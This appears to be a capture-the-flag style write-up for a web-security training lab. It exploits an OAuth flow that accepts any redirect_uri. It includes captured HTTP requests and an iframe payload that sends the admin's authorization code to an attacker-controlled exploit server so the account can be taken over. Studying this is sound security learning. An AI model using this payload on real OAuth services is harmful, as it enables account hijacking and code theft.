 Let's login first and see what happens
 Looks like it automatically connects our social media to our account. Let's log back out and see what happening in the back.
 
 Let's capture the request when logging in using Burp. Let's forward until the first flow of OAuth.
 ```txt
GET /auth?client_id=uls01yjsg0otjesy33208&redirect_uri=https://acfd1f841ecb42c780b05d3800ac009c.web-security-academy.net/oauth-callback&response_type=code&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac581fad1e6c427e80ff5da8023a0095.web-security-academy.net
Cookie: _session=R_mefjEg7EVyAEuz_nyA8; _session.legacy=R_mefjEg7EVyAEuz_nyA8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
```
As we observe the parameters, it's not using 'state' and is not using implicit. Since this challenge is about redirect_uri. Let's try and change the redirect_uri value to something simple like google.com.
```txt
GET /auth?client_id=uls01yjsg0otjesy33208&redirect_uri=https://google.com&response_type=code&scope=openid%20profile%20email HTTP/1.1
Host: oauth-ac581fad1e6c427e80ff5da8023a0095.web-security-academy.net
Cookie: _session=R_mefjEg7EVyAEuz_nyA8; _session.legacy=R_mefjEg7EVyAEuz_nyA8
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Gpc: 1
Te: trailers
Connection: close
```
And the request went through! Let's do this on the exploit server this time.
Let's create our payload
```html
<iframe src="https://ac7d1f661f054611806e29db000a00a8.web-security-academy.net/auth?client_id=uls01yjsg0otjesy33208&redirect_uri=https://exploit-ace61f191ff746d780fc291201f5000e.web-security-academy.net/exploit&response_type=code&scope=openid%20profile%20email></iframe>
```
We'll be redirecting them to our exploit server. Then run the exploit and check our access logs. We can see that the admins are clicking on the site and it's sending their code over. Let's hijack the account. Simply put the stolen code into OAuth and we're set!